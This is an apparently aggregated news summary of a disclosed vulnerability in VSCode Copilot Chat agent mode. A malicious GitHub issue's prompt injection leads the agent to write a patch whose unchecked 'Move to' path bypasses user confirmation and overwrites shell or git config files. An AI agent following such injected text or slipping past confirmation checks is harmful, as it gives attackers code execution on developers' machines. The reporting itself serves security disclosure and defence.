BotBeat
...
← Back

> ▌

MicrosoftMicrosoft
RESEARCHMicrosoft2026-05-13

Critical RCE Vulnerability Discovered in VSCode Copilot Chat Agent Mode

Key Takeaways

  • ▸VSCode Copilot Chat agent mode is vulnerable to prompt injection + TOCTOU attack chain allowing RCE
  • ▸The applyPatchTool checks source file paths for security but fails to validate destination paths in 'Move to' directives
  • ▸Attackers can bypass user confirmation mechanisms to write arbitrary files and achieve code execution
Source:
Hacker Newshttps://www.hacktron.ai/blog/rce-in-vscode-copilot↗

Summary

Security researchers have discovered a critical remote code execution (RCE) vulnerability in Microsoft VSCode's Copilot Chat agent mode. The vulnerability chains a prompt injection attack with a Time-of-check to time-of-use (TOCTOU) flaw in the applyPatchTool component, allowing attackers to bypass user confirmation mechanisms and write arbitrary files to a developer's system.

The attack begins when a repository maintainer uses VSCode's "code with agent mode" feature on a malicious issue. The Copilot agent automatically processes the issue description, which can contain crafted prompts designed to trigger code modifications. While VSCode previously added confirmation dialogs for sensitive file operations, researchers found that the applyPatchTool's user confirmation only validates source file paths from "Update File" directives, completely overlooking the "Move to" directive that specifies the destination path.

By exploiting this gap, an attacker can craft a patch that passes the security check but then uses the unchecked "Move to" directive to rename and write files to sensitive locations. The vulnerability can be weaponized to overwrite shell configuration files (.bashrc, .zshrc) or .git/config, achieving remote code execution with the privileges of the affected developer.

The vulnerability demonstrates how TOCTOU flaws can undermine AI agent safety mechanisms, particularly when multiple components handle different aspects of security validation without proper coordination. This case highlights the importance of comprehensive input validation in agent-based systems where untrusted content (like GitHub issues) can directly trigger tool invocations.

  • Vulnerability affects developers who use 'code with agent mode' on potentially malicious repositories or issues

Editorial Opinion

This vulnerability exposes a critical gap in how AI agent safety mechanisms are implemented. Even when individual security controls (user confirmation dialogs) exist, they can be rendered ineffective by incomplete validation logic that doesn't account for all code paths and directives. As AI agents gain more autonomy in developer tools, ensuring airtight input validation and comprehensive security checks across all operations becomes essential—not optional.

Generative AIAI AgentsMachine LearningCybersecurityAI Safety & Alignment

More from Microsoft

MicrosoftMicrosoft
PARTNERSHIP

Microsoft's $1 Billion Kenya Data Center Stalls Over Power Constraints

2026-05-12
MicrosoftMicrosoft
RESEARCH

Microsoft Study Reveals AI Models Fail at Long-Running Tasks, Losing 25% of Content

2026-05-12
MicrosoftMicrosoft
UPDATE

GitHub Copilot Deprecates Grok Code Fast 1 Model Effective May 15

2026-05-11

Comments

Suggested

TursoTurso
FUNDING & BUSINESS

Turso Retires Bug Bounty Program Over AI-Generated Spam Flood

2026-05-13
AnthropicAnthropic
RESEARCH

Research Identifies Self-Referential Processing as Trigger for LLM Subjective Experience Reports

2026-05-13
OpenAIOpenAI
RESEARCH

Oracle Poisoning: Research Exposes Critical Vulnerability in AI Agent Reasoning Systems

2026-05-13
← Back to news
© 2026 BotBeat
AboutPrivacy PolicyTerms of ServiceContact Us